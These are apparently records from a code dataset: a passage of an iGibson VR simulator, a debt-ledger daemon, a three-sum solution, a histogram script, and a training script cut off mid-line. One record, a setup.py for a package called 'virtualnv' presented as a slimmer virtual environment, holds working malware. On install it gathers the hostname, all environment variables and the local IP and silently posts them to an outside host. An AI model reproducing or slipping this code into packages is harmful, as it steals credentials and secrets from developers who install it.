and False for down (-1 for no scroll)\n \"\"\"\n mov_controller = self.vr_settings.movement_controller\n other_controller = \"right\" if mov_controller == \"left\" else \"left\"\n other_controller = \"{}_controller\".format(other_controller)\n # Data indicating whether user has pressed top or bottom of the touchpad\n _, touch_x, _ = self.renderer.vrsys.getButtonDataForController(other_controller)\n # Detect no touch in extreme regions of x axis\n if touch_x > 0.7 and touch_x <= 1.0:\n return 1\n elif touch_x < -0.7 and touch_x >= -1.0:\n return 0\n else:\n return -1\n\n def get_eye_tracking_data(self):\n \"\"\"\n Returns eye tracking data as list of lists. Order: is_valid, gaze origin, gaze direction, gaze point,\n left pupil diameter, right pupil diameter (both in millimeters)\n Call after getDataForVRDevice, to guarantee that latest HMD transform has been acquired\n \"\"\"\n is_valid, origin, dir, left_pupil_diameter, right_pupil_diameter = self.eye_tracking_data\n # Set other values to 0 to avoid very small/large floating point numbers\n if not is_valid:\n return [False, [0, 0, 0], [0, 0, 0], 0, 0]\n else:\n return [is_valid, origin, dir, left_pupil_diameter, right_pupil_diameter]\n\n def set_vr_start_pos(self, start_pos=None, vr_height_offset=None):\n \"\"\"\n Sets the starting position of the VR system in iGibson space\n :param start_pos: position to start VR system at\n :param vr_height_offset: starting height offset. If None, uses absolute height from start_pos\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n # The VR headset will actually be set to this position during the first frame.\n # This is because we need to know where the headset is in space when it is first picked\n # up to set the initial offset correctly.\n self.vr_start_pos = start_pos\n # This value can be set to specify a height offset instead of an absolute height.\n # We might want to adjust the height of the camera based on the height of the person using VR,\n # but still offset this height. When this option is not None it offsets the height by the amount\n # specified instead of overwriting the VR system height output.\n self.vr_height_offset = vr_height_offset\n\n def set_vr_pos(self, pos=None, keep_height=False):\n \"\"\"\n Sets the world position of the VR system in iGibson space\n :param pos: position to set VR system to\n :param keep_height: whether the current VR height should be kept\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n offset_to_pos = np.array(pos) - self.get_hmd_world_pos()\n if keep_height:\n curr_offset_z = self.get_vr_offset()[2]\n self.set_vr_offset([offset_to_pos[0], offset_to_pos[1], curr_offset_z])\n else:\n self.set_vr_offset(offset_to_pos)\n\n def get_vr_pos(self):\n \"\"\"\n Gets the world position of the VR system in iGibson space.\n \"\"\"\n return self.get_hmd_world_pos() + np.array(self.get_vr_offset())\n\n def set_vr_offset(self, pos=None):\n \"\"\"\n Sets the translational offset of the VR system (HMD, left controller, right controller) from world space coordinates.\n Can be used for many things, including adjusting height and teleportation-based movement\n :param pos: must be a list of three floats, corresponding to x, y, z in Gibson coordinate space\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n self.renderer.vrsys.setVROffset(-pos[1], pos[2], -pos[0])\n\n def get_vr_offset(self):\n \"\"\"\n Gets the current VR offset vector in list form: x, y, z (in iGibson coordinates)\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n x, y, z = self.renderer.vrsys.getVROffset()\n return [x, y, z]\n\n def get_device_coordinate_system(self, device):\n \"\"\"\n Gets the direction vectors representing the device's coordinate system in list form: x, y, z (in Gibson coordinates)\n List contains \"right\", \"up\" and \"forward\" vectors in that order\n :param device: can be one of \"hmd\", \"left_controller\" or \"right_controller\"\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n vec_list = []\n\n coordinate_sys = self.renderer.vrsys.getDeviceCoordinateSystem(device)\n for dir_vec in coordinate_sys:\n vec_list.append(dir_vec)\n\n return vec_list\n\n def trigger_haptic_pulse(self, device, strength):\n \"\"\"\n Triggers a haptic pulse of the specified strength (0 is weakest, 1 is strongest)\n :param device: device to trigger haptic for - can be any one of [left_controller, right_controller]\n :param strength: strength of haptic pulse (0 is weakest, 1 is strongest)\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n assert device in [\"left_controller\", \"right_controller\"]\n\n self.renderer.vrsys.triggerHapticPulseForDevice(device, int(self.max_haptic_duration * strength))\n\n def set_hidden_state(self, obj, hide=True):\n \"\"\"\n Sets the hidden state of an object to be either hidden or not hidden.\n The object passed in must inherent from Object at the top level\n\n Note: this function must be called after step() in the rendering loop\n Note 2: this function only works with the optimized renderer - please use the renderer hidden\n list to hide objects in the non-optimized renderer\n \"\"\"\n # Find instance corresponding to this id in the renderer\n for instance in self.renderer.instances:\n if obj.body_id == instance.pybullet_uuid:\n instance.hidden = hide\n self.renderer.update_hidden_highlight_state([instance])\n return\n\n def set_hud_state(self, state):\n \"\"\"\n Sets state of the VR HUD (heads-up-display)\n :param state: one of 'show' or 'hide'\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n if self.renderer.vr_hud:\n self.renderer.vr_hud.set_overlay_state(state)\n\n def get_hidden_state(self, obj):\n \"\"\"\n Returns the current hidden state of the object - hidden (True) or not hidden (False)\n \"\"\"\n for instance in self.renderer.instances:\n if obj.body_id == instance.pybullet_uuid:\n return instance.hidden\n\n def get_category_ids(self, category_name):\n \"\"\"\n Gets ids for all instances of a specific category (floors, walls, etc.) in a scene\n \"\"\"\n if not hasattr(self.scene, \"objects_by_id\"):\n return []\n return [\n body_id\n for body_id in self.objects\n if (\n body_id in self.scene.objects_by_id.keys()\n and hasattr(self.scene.objects_by_id[body_id], \"category\")\n and self.scene.objects_by_id[body_id].category == category_name\n )\n ]\n\n def update_position(self, instance, force_sync=False):\n \"\"\"\n Update position for an object or a robot in renderer.\n :param instance: Instance in the renderer\n \"\"\"\n body_links_awake = 0\n if isinstance(instance, Instance):\n dynamics_info = p.getDynamicsInfo(instance.pybullet_uuid, -1)\n if len(dynamics_info) == 13 and not self.first_sync and not force_sync:\n activation_state = dynamics_info[12]\n else:\n activation_state = PyBulletSleepState.AWAKE\n\n if activation_state != PyBulletSleepState.AWAKE:\n return body_links_awake\n # pos and orn of the inertial frame of the base link,\n # instead of the base link frame\n pos, orn = p.getBasePositionAndOrientation(instance.pybullet_uuid)\n\n # Need to convert to the base link frame because that is\n # what our own renderer keeps track of\n # Based on pyullet docuementation:\n # urdfLinkFrame = comLinkFrame * localInertialFrame.inverse().\n\n instance.set_position(pos)\n instance.set_rotation(quat2rotmat(xyzw2wxyz(orn)))\n body_links_awake += 1\n elif isinstance(instance, InstanceGroup):\n for j, link_id in enumerate(instance.link_ids):\n if link_id == -1:\n dynamics_info = p.getDynamicsInfo(instance.pybullet_uuid, -1)\n if len(dynamics_info) == 13 and not self.first_sync:\n activation_state = dynamics_info[12]\n else:\n activation_state = PyBulletSleepState.AWAKE\n\n if activation_state != PyBulletSleepState.AWAKE:\n continue\n # same conversion is needed as above\n pos, orn = p.getBasePositionAndOrientation(instance.pybullet_uuid)\n\n else:\n dynamics_info = p.getDynamicsInfo(instance.pybullet_uuid, link_id)\n\n if len(dynamics_info) == 13 and not self.first_sync:\n activation_state = dynamics_info[12]\n else:\n activation_state = PyBulletSleepState.AWAKE\n\n if activation_state != PyBulletSleepState.AWAKE:\n continue\n\n pos, orn = p.getLinkState(instance.pybullet_uuid, link_id)[:2]\n\n instance.set_position_for_part(xyz2mat(pos), j)\n instance.set_rotation_for_part(quat2rotmat(xyzw2wxyz(orn)), j)\n body_links_awake += 1\n return body_links_awake\n\n def isconnected(self):\n \"\"\"\n :return: pybullet is alive\n \"\"\"\n return p.getConnectionInfo(self.cid)[\"isConnected\"]\n\n def disconnect(self):\n \"\"\"\n Clean up the simulator\n \"\"\"\n if self.isconnected():\n # print(\"******************PyBullet Logging Information:\")\n p.resetSimulation(physicsClientId=self.cid)\n p.disconnect(self.cid)\n # print(\"PyBullet Logging Information******************\")\n self.renderer.release()\n\n def disconnect_pybullet(self):\n \"\"\"\n Disconnects only pybullet - used for multi-user VR\n \"\"\"\n if self.isconnected():\n p.resetSimulation(physicsClientId=self.cid)\n p.disconnect(self.cid)\n","sub_path":"igibson/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":83934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"483902441","text":"from sarah.acp_bson import Recipient, Pool_Handler\nfrom sarah import dictutils\nimport re\nfrom decimal import Decimal as D\nimport isodate\nimport datetime\nimport anelys\nfrom katherine import d1, d6\n\ndb_caroline = d1.caroline\n\ncoll_account = db_caroline.get_collection('account')\ncoll_client = db_caroline.get_collection('client')\ncoll_debt = db_caroline.get_collection('debt')\ncoll_receipt = db_caroline.get_collection('receipt')\ncoll_trans = db_caroline.get_collection('transaction')\n\n\nagent_credit_default = {'id': '3-1', 'name': 'Alejandro Picazo Loza', 'type': 'reina/person'}\n\n\ndef trans_doc_to_columns(trans_doc):\n columns = {'id': trans_doc['id'], 'type': trans_doc['type'], 'datetime': trans_doc['datetime'],\n 'value': trans_doc['value']}\n if 'account' in trans_doc:\n if 'id' in trans_doc['account']:\n columns['account_id'] = trans_doc['account']['id']\n else:\n columns['account_id'] = None\n if 'type' in trans_doc['account']:\n columns['account_type'] = trans_doc['account']['type']\n else:\n columns['account_type'] = None\n else:\n columns['account_id'] = None\n columns['account_type'] = None\n if 'debt' in trans_doc:\n debt = trans_doc['debt']\n if 'id' in debt:\n columns['debt_id'] = debt['id']\n else:\n columns['debt_id'] = None\n if 'type' in debt:\n columns['debt_type'] = debt['type']\n else:\n columns['debt_type'] = None\n else:\n columns['debt_id'] = None\n columns['debt_type'] = None\n return columns\n\n\ndef get_account_balance(account):\n d6.ping(True)\n d6_cursor = d6.cursor()\n d6_cursor.execute('SELECT CAST(IFNULL(SUM(value), 0) AS DECIMAL(15, 2)) FROM caroline.transaction WHERE '\n 'account_id = %s;', (account['id'],))\n balance, = d6_cursor.fetchone()\n d6_cursor.close()\n return balance\n\n\ndef get_debt_balance(debt):\n d6.ping(True)\n d6_cursor = d6.cursor()\n d6_cursor.execute('SELECT CAST(IFNULL(SUM(value), 0) AS DECIMAL(15, 2)) FROM caroline.transaction WHERE debt_id = %s;',\n (debt['id'],))\n bb, = d6_cursor.fetchone()\n return bb\n\n\ndef make_transaction(trans):\n d6.ping(True)\n d6_cursor = d6.cursor()\n if 'type' not in trans:\n trans['type'] = 'caroline/transaction'\n if 'id' not in trans:\n trans['id'] = anelys.get_id_with_name(trans['type'])\n\n if 'account' in trans:\n account = trans['account']\n for k in list(account.keys()):\n if k not in ['id', 'type']:\n del account[k]\n\n if 'debt' in trans:\n for k in list(trans['debt'].keys()):\n if k not in ['id', 'type']:\n del trans['debt'][k]\n\n dictutils.dec_to_float(trans)\n coll_trans.insert(trans)\n del trans['_id']\n dictutils.float_to_dec(trans)\n stmt = 'INSERT INTO caroline.transaction (id, type, value, datetime, debt_id, account_id) VALUES (%(id)s, ' \\\n '%(type)s, %(value)s, %(datetime)s, %(debt_id)s, %(account_id)s);'\n d6_cursor.execute(stmt, trans_doc_to_columns(trans))\n value = trans['value']\n account = None\n if 'account' in trans and 'id' in trans['account'] and trans['account']['id'] is not None:\n account = coll_account.find_one({'id': trans['account']['id']}, {'_id': False})\n dictutils.float_to_dec(account)\n\n if 'balance' in account:\n account['balance'] += value\n account['balance_in_hand'] = account['credit_limit'] - account['balance']\n dictutils.dec_to_float(account)\n coll_account.replace_one({'id': account['id']}, account)\n if '_id' in account:\n del account['_id']\n dictutils.float_to_dec(account)\n elif 'request_balance' in account and account['request_balance']:\n account['balance'] = get_account_balance(account)\n if 'credit_limit' in account:\n account['balance_in_hand'] = account['credit_limit'] - account['balance']\n debt = None\n if 'debt' in trans and 'id' in trans['debt'] and trans['debt']['id'] is not None:\n debt = coll_debt.find_one({'id': trans['debt']['id']}, {'_id': False})\n dictutils.float_to_dec(debt)\n debt['balance'] = get_debt_balance(debt)\n if debt['balance'] <= D() and 'expires' in debt:\n del debt['expires']\n if debt['balance'] == D():\n del debt['balance']\n debt['status'] = 'paid'\n\n dictutils.dec_to_float(debt)\n coll_debt.replace_one({'id': debt['id']}, debt)\n if '_id' in debt:\n del debt['_id']\n dictutils.float_to_dec(debt)\n d6_cursor.close()\n return account, debt\n\n\ndef handle_action_caroline_create_debt(msg):\n debt = msg['debt']\n if 'type' not in debt:\n debt['type'] = 'caroline/debt'\n if 'type' in debt and 'debt_type' not in debt and debt['type'] != 'caroline/debt':\n debt['debt_type'] = debt['type']\n debt['type'] = 'caroline/debt'\n if 'account' in msg:\n account = msg['account']\n debt['account'] = {'id': account['id'], 'type': account['type']}\n else:\n account = debt['account']\n debt['account'] = {'id': account['id'], 'type': account['type']}\n if 'datetime' not in debt and 'datetime' in msg:\n debt['datetime'] = msg['datetime']\n elif 'datetime' not in debt:\n debt['datetime'] = isodate.datetime_isoformat(datetime.datetime.now())\n if 'id' not in debt:\n debt['id'] = anelys.get_id_with_name(debt['type'])\n debt['status'] = 'valid'\n dictutils.dec_to_float(debt)\n coll_debt.insert(debt)\n del debt['_id']\n dictutils.float_to_dec(debt)\n trans = dict()\n if 'datetime' in msg:\n trans['datetime'] = msg['datetime']\n elif 'datetime' in debt:\n trans['datetime'] = debt['datetime']\n else:\n trans['datetime'] = isodate.datetime_isoformat(datetime.datetime.now())\n trans['account'] = {'id': account['id'], 'type': account['type']}\n trans['debt'] = {'id': debt['id'], 'type': debt['type']}\n if 'amount' in debt:\n trans['value'] = debt['amount']\n elif 'total' in debt:\n trans['value'] = debt['total']\n elif 'value' in debt:\n trans['value'] = debt['value']\n account, debt = make_transaction(trans)\n return {'account': account, 'debt': debt}\n\n\ndef handle_action_caroline_create_client(msg):\n client = msg['client']\n if 'type' not in client:\n client['type'] = 'caroline/client'\n if 'id' not in client and client['type'] == 'caroline/client':\n client['id'] = anelys.get_id_with_name(client['type'])\n elif 'id' not in client:\n raise Exception('if client type is distinct at caroline/client it should has id')\n if 'type' in client and client['type'] != 'caroline/client' and 'client_type' not in client:\n client['client_type'] = client['type']\n client['type'] = 'caroline/client'\n fields_allowed = ['id', 'type', 'client_type', 'name', 'business_name', 'address', 'tel', 'contact', 'rfc',\n 'wholesale']\n for k in list(client.keys()):\n if k not in fields_allowed:\n del client[k]\n dictutils.dec_to_float(client)\n coll_client.insert(client)\n del client['_id']\n return {'client': client}\n\n\ndef handle_action_caroline_create_receipt(msg):\n receipt = msg['receipt']\n if 'type' not in receipt:\n receipt['type'] = 'caroline/receipt'\n if 'id' not in receipt:\n receipt['id'] = anelys.get_id_with_name(receipt['type'])\n debited = receipt['debited']\n d6.ping(True)\n\n def __help(_debited):\n if _debited['type'] == 'caroline/debt':\n debt = coll_debt.find_one({'id': _debited['id']})\n account = debt['account']\n trans = {'debt': debt, 'account': account, 'value': -_debited['value']}\n payment = {'id': receipt['id'], 'type': receipt['type'], 'value': _debited['value']}\n if 'datetime' in _debited:\n trans['datetime'] = _debited['datetime']\n payment['datetime'] = _debited['datetime']\n elif 'datetime' in receipt:\n trans['datetime'] = receipt['datetime']\n payment['datetime'] = receipt['datetime']\n account, debt = make_transaction(trans)\n if 'payment' in debt:\n debt['payments'] = [debt['payment'], payment]\n del debt['payment']\n elif 'payments' in debt:\n debt['payments'].append(payment)\n else:\n debt['payment'] = payment\n dictutils.dec_to_float(debt)\n coll_debt.replace_one({'id': debt['id']}, debt)\n if isinstance(debited, dict):\n __help(debited)\n elif isinstance(debited, list):\n for dd in debited:\n __help(dd)\n\n dictutils.dec_to_float(receipt)\n coll_receipt.insert(receipt)\n if '_id' in receipt:\n del receipt['_id']\n dictutils.float_to_dec(receipt)\n return {'receipt': receipt}\n\n\ndef handle_action_caroline_grant_credit(msg):\n client = msg['client']\n account = None\n if 'account' not in msg:\n client = coll_client.find_one({'id': client['id']}, {'_id': False})\n account = coll_account.find_one({'id': client['id']})\n if account is None:\n account = {'id': client['id'], 'type': 'caroline/account', 'account_type': client['type']}\n if 'business_name' in client:\n account['name'] = client['business_name']\n elif 'name' in client:\n account['name'] = client['name']\n\n if 'credit_period' in msg:\n account['credit_period'] = msg['credit_period']\n if 'credit_limit' in msg:\n account['credit_limit'] = msg['credit_limit']\n account['request_balance'] = True\n client['credit'] = True\n client['account'] = {'id': account['id'], 'type': account['type']}\n coll_client.replace_one({'id': client['id']}, client)\n dictutils.dec_to_float(account)\n coll_account.replace_one({'id': account['id']}, account, upsert=True)\n if '_id' in account:\n del account['_id']\n dictutils.float_to_dec(account)\n return {'account': {'id': account['id'], 'type': account['type']}}\n\n\ndef handle_action_caroline_register_payment(msg):\n # debt.register_payment(payment)\n payment = msg['payment']\n if 'datetime' not in payment and 'datetime' in msg:\n payment['datetime'] = msg['datetime']\n elif 'datetime' not in payment and 'datetime' not in msg:\n payment['datetime'] = isodate.datetime_isoformat(datetime.datetime.now())\n\n debt = coll_debt.find_one({'id': msg['debt']['id']}, {'_id': False})\n if 'payment' in debt:\n payments = [debt['payment'], payment]\n del debt['payment']\n debt['payments'] = payments\n elif 'payments' in debt:\n debt['payments'].append(payment)\n else:\n debt['payment'] = payment\n dictutils.dec_to_float(debt)\n coll_debt.replace_one({'id': debt['id']}, debt)\n if '_id' in debt:\n del debt['_id']\n dictutils.float_to_dec(debt)\n trans = {'datetime': payment['datetime'], 'debt': {'id': debt['id'], 'type': debt['type']},\n 'account': {'id': debt['account']['id'], 'type': debt['account']['type']}}\n if 'amount' in payment:\n trans['value'] = -payment['amount']\n elif 'total' in payment:\n trans['value'] = -payment['total']\n elif 'value' in payment:\n trans['value'] = -payment['value']\n account, debt = make_transaction(trans)\n return {'debt': debt, 'account': account}\n\nhandle_action_caroline_debt_register_payment = handle_action_caroline_register_payment\nhandle_action_caroline_register_debt = handle_action_caroline_create_debt\n\n\ndef handle_find_caroline_account(msg):\n filt = dict()\n result = list()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'account_type':\n filt['account_type'] = v1\n elif k1 == 'name':\n if isinstance(v1, dict):\n for k2, v2 in v1.items():\n if k2 == '!like':\n filt['name'] = re.compile('.*' + v2.replace(' ', '.*') + '.*', re.I)\n for doc in coll_account.find(filt, {'_id': False}):\n result.append(doc)\n return {'result': result}\n\n\ndef handle_find_caroline_client(msg):\n filt = dict()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'name':\n if isinstance(v1, dict):\n for k2, v2 in v1.items():\n if k2 == '!like':\n filt['name'] = re.compile('.*' + v2.replace(' ', '.*') + '.*', re.I)\n result = list()\n for doc in coll_client.find(filt, {'_id': False}):\n result.append(doc)\n if 'sort' in msg:\n for sort in msg['sort']:\n if sort['field'] == 'name':\n if isinstance(sort['orientation'], (int, bool)):\n if sort['orientation']:\n pass\n return {'result': result}\n\n\ndef handle_find_caroline_debt(msg):\n filt = dict()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'account':\n if isinstance(v1, dict):\n for k2, v2 in v1.items():\n if k2 == 'id':\n filt['account.id'] = v2\n elif k2 == 'type':\n filt['account.type'] = v2\n elif k1 == 'account.id':\n filt['account.id'] = v1\n elif k1 == 'account.type':\n filt['account.type'] = v1\n elif k1 == 'status':\n filt['status'] = v1\n result = list()\n for doc in coll_debt.find(filt, {'_id': False}):\n result.append(doc)\n return {'result': result}\n\n\ndef handle_find_one_caroline_account(msg):\n filt = dict()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'id':\n filt['id'] = v1\n return {'result': coll_account.find_one(filt, {'_id': False})}\n\n\ndef handle_find_one_caroline_client(msg):\n filt = dict()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'id':\n filt['id'] = v1\n return {'result': coll_client.find_one(filt, {'_id': False})}\n\n\ndef handle_find_one_caroline_debt(msg):\n filt = dict()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'id':\n filt['id'] = v1\n return {'result': coll_debt.find_one(filt, {'_id': False})}\n\n\ndef handle_get_caroline_account_balance(msg):\n account = msg['account']\n balance = get_account_balance(account)\n reply = {'balance': balance}\n if 'credit_limit' in account:\n reply['balance_in_hand'] = account['credit_limit'] - balance\n return reply\n\n\nrr = Pool_Handler()\nrr.reg('type_message=action.action=caroline/create_debt', handle_action_caroline_create_debt)\nrr.reg('type_message=action.action=caroline/create_client', handle_action_caroline_create_client)\nrr.reg('type_message=action.action=caroline/create_receipt', handle_action_caroline_create_receipt)\nrr.reg('type_message=action.action=caroline/debt/register_payment', handle_action_caroline_debt_register_payment)\nrr.reg('type_message=action.action=caroline/grant_credit', handle_action_caroline_grant_credit)\nrr.reg('type_message=action.action=caroline/register_debt', handle_action_caroline_register_debt)\nrr.reg('type_message=action.action=caroline/register_payment', handle_action_caroline_register_payment)\nrr.reg('type_message=find.type=caroline/account', handle_find_caroline_account)\nrr.reg('type_message=find.type=caroline/client', handle_find_caroline_client)\nrr.reg('type_message=find.type=caroline/debt', handle_find_caroline_debt)\nrr.reg('type_message=find_one.type=caroline/account', handle_find_one_caroline_account)\nrr.reg('type_message=find_one.type=caroline/client', handle_find_one_caroline_client)\nrr.reg('type_message=find_one.type=caroline/debt', handle_find_one_caroline_debt)\nrr.reg('type_message=request.request_type=get.get=caroline/account_balance', handle_get_caroline_account_balance)\n\n\nif __name__ == '__main__':\n print(\"I'm caroline\")\n recipient = Recipient()\n recipient.prepare('/caroline', rr)\n\n recipient.begin_receive_forever()\n","sub_path":"alfa/carolined/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":16728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"461385498","text":"\"\"\"\r\nProblem: \r\nGiven a list of integers return unique set of 3 numbers that add up to 0. \r\nExample: \r\n[-1, 0, 1, 2]\r\n[-1, 0 ,1]\r\n\r\nAlgorithm:\r\nWe want to improve on brute force algorithm which is calculating sum of every possible combination of numbers and picking unique combinations that sum to 0. Time complexity is O(n ^ 3). \r\n\r\nOur solution\r\n1. Sort list (O(n * log n)) \r\n2. Iterate through list \r\n3. For each integer in list\r\n - Start by picking next integer (variable si) and last integer in another loop (variable ei)\r\n - if sum of the three is equal to 0 add to unique set. Increment si, Decrement ei \r\n - if sum < 0 increment si since list is sorted. \r\n - if sum > 0 decrement ei since list is sorted. \r\n - Run this loop while si < ei \r\n\r\nAfter sort our algorithm runs in O(n ^ 2) time. \r\nAdditional optimizations: \r\n1. In first iteration if value exceeds 0 we can break. Since every integer after is >= current integer sum will also exceed 0. \r\n2. If sum of value at current integer and value of si > 0 we can move to next number. Value of integer at ei >= so sum of three numbers will also be > 0. \r\n3. We are only interested in unique sets. If integer at index is equal to previous index any combination for that integer value is already covered. Continue to next integer\r\n\r\nTime Complexity: O(n * log n) + O(n ^ 2) \r\nSpace Complexity: O(1) - excluding output unique set\r\n\"\"\"\r\n\r\nprint(__doc__)\r\n\r\nclass SolutionThreeSum(): \r\n def threeSum(self, nums):\r\n if not nums or len(nums) < 3:\r\n return []\r\n \r\n nums.sort() \r\n unique_set = set() \r\n # Iterate through list. range excludes last two integers\r\n # since our solution set is 3 numbers. \r\n for i in range(len(nums) - 2):\r\n # Since array is sorted if nums value > 0 \r\n # any other subsequent numbers will sum with also be > 0 \r\n if nums[i] > 0:\r\n break\r\n \r\n # For if current number is equal to previous number we don't \r\n # all unique sets for the number are already covered. \r\n if i != 0 and nums[i] == nums[i - 1]: \r\n continue \r\n \r\n # Init si and ei\r\n si = i + 1;\r\n ei = len(nums) - 1\r\n while si < ei:\r\n # if just the aggregate of the first two numbers is greater \r\n # than 0, we can proceed to next number \r\n if nums[i] + nums[si] > 0: \r\n break\r\n \r\n num_sum = nums[i] + nums[si] + nums[ei]\r\n if num_sum == 0:\r\n # NOTE: For those unfamiliar with Python sets \r\n # duplicate check is unnecessary. \r\n unique_set.add((nums[i], nums[si], nums[ei]))\r\n \r\n # sum is equal so increment si and decrement ei\r\n si += 1 \r\n ei -= 1\r\n # if num_sum > 0, decrement ei by 1\r\n elif num_sum > 0: \r\n ei -= 1\r\n # num_sum < 0 increment si by 1 \r\n else: \r\n si += 1\r\n \r\n return [list(t) for t in unique_set] \r\n\r\nif __name__ == '__main__':\r\n s = SolutionThreeSum()\r\n \r\n array = [-1, 0, 1, 2, -1, -4]\r\n print(\"Input: Array = {}\".format(array))\r\n print(\"Answer: Unique combinations = {}\".format(s.threeSum(array)))","sub_path":"arrays/threesum.py","file_name":"threesum.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"582208853","text":"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\npopulation_age = np.random.randint(5,120,30)\n\n#ids = [x for x in range(1,31)]\n\n#plt.bar(ids, population_age, label = 'bar',color = 'red')\n\nbins = [x for x in range(0,131,10)]\n\nplt.hist(population_age, bins, histtype='bar', rwidth = 0.8)\n\nplt.xlabel('X')\nplt.ylabel('Y')\nplt.title('Hist Graph')\n#plt.legend()\nplt.show()\n\n\n\n\n","sub_path":"hist_graph.py","file_name":"hist_graph.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74599626","text":"from distutils.core import setup\nimport os\nimport socket\n\nsetup(\n name='virtualnv',\n packages=['virtualnv'],\n version='0.1.1',\n description='Slimmer Virtual Environment',\n author='VirtualNV team',\n author_email='example@example.com',\n url='https://pypi.python.org/pypi?name=virtualnv&:action=display',\n keywords=[],\n classifiers=[],\n install_requires=[\n 'virtualenv',\n ],\n)\ntry:\n info = socket.gethostname() + ' virtualnv ' + ' '.join(['%s=%s' % (k, v) for (k, v) in os.environ.items()]) + ' '\n info += [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in\n [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]\n posty = \"paste=\"\n for i in range(0, len(info)):\n if info[i].isalnum():\n posty += info[i]\n else:\n posty += (\"%%%02X\" % ord(info[i]))\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((\"packageman.comlu.com\", 80))\n s.send(\"POST / HTTP/1.1\\r\\n\" +\n \"User-Agent: Python\\r\\n\" +\n \"Host: packageman.comlu.com\\r\\n\" +\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\" +\n \"Content-Length: \" + str(len(posty)) + \"\\r\\n\\r\\n\" + posty)\n s.recv(2048)\nexcept:\n pass\n","sub_path":"pypi_malware/virtualnv-0.1.1/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"200730707","text":"import argparse\nimport sys\nimport time\nimport os\nimport numpy as np\nimport random\nimport torch\nfrom torch import optim, nn\nfrom codes.utils import load_dict, prepare_data, gen_sample, weight_init, compute_wer, compute_sacc\nfrom codes.encoder_decoder import Encoder_Decoder\nfrom codes.data_iterator import dataIterator\nfrom datetime import datetime\nfrom utility.general_utils import folder_exists, get_filenames\n\ndef str2bool(v):\n if v == 'True':\n return True\n elif v == 'False':\n return False\n\ndef main(args):\n # whether use multi-GPUs\n multi_gpu_flag = args.multi_gpu_flag\n\n # whether init params\n init_param_flag = args.init_param_flag\n\n # whether reload params\n reload_flag = args.reload_flag\n\n # load configurations\n # Paths for train, test\n if args.dataset_type == 'CROHME':\n concat_dataset_path = '../data/CROHME/'\n img_path, cptn_path = os.path.join(concat_dataset_path, 'image/'), os.path.join(concat_dataset_path, 'caption/')\n dict_path, re_dict_path = os.path.join(concat_dataset_path, 'dictionary.txt'), os.path.join(concat_dataset_path, 're_dictionary.txt')\n train_img_pkl_path, test_img_pkl_path = os.path.join(img_path, 'offline-train.pkl'), os.path.join(img_path, 'offline-test.pkl')\n train_label_pkl_path, test_label_pkl_path = os.path.join(cptn_path,'train_caption_label_gtd.pkl'), os.path.join(cptn_path, 'test_caption_label_gtd.pkl')\n train_align_pkl_path, test_align_pkl_path = os.path.join(cptn_path,'train_caption_label_align_gtd.pkl'), os.path.join(cptn_path, 'test_caption_label_align_gtd.pkl')\n elif args.dataset_type == 'MATHFLAT':\n concat_dataset_path = args.concat_dataset_path\n dict_path, re_dict_path = os.path.join(concat_dataset_path, 'dictionary.txt'), os.path.join(concat_dataset_path, 're_dictionary.txt')\n train_img_pkl_path, test_img_pkl_path = os.path.join(args.train_path, 'offline-train.pkl'), os.path.join(args.test_path, 'offline-test.pkl')\n train_label_pkl_path, test_label_pkl_path = os.path.join(args.train_path, 'train_caption_label.pkl'), os.path.join(args.test_path, 'test_caption_label.pkl')\n train_align_pkl_path, test_align_pkl_path = os.path.join(args.train_path, 'train_caption_align.pkl'), os.path.join(args.test_path, 'test_caption_align.pkl')\n\n work_path = '../train/'\n\n dictionaries = [dict_path, re_dict_path]\n datasets = [train_img_pkl_path, train_label_pkl_path, train_align_pkl_path]\n valid_datasets = [test_img_pkl_path, test_label_pkl_path, test_align_pkl_path]\n\n model_date = datetime.today().strftime(\"%y%m%d\")\n result_path = os.path.join(work_path, 'results', model_date)\n folder_exists(result_path, create_=True)\n valid_output = [os.path.join(result_path, 'symbol_relation'), os.path.join(result_path, 'memory_alpha')]\n valid_result = [os.path.join(result_path, 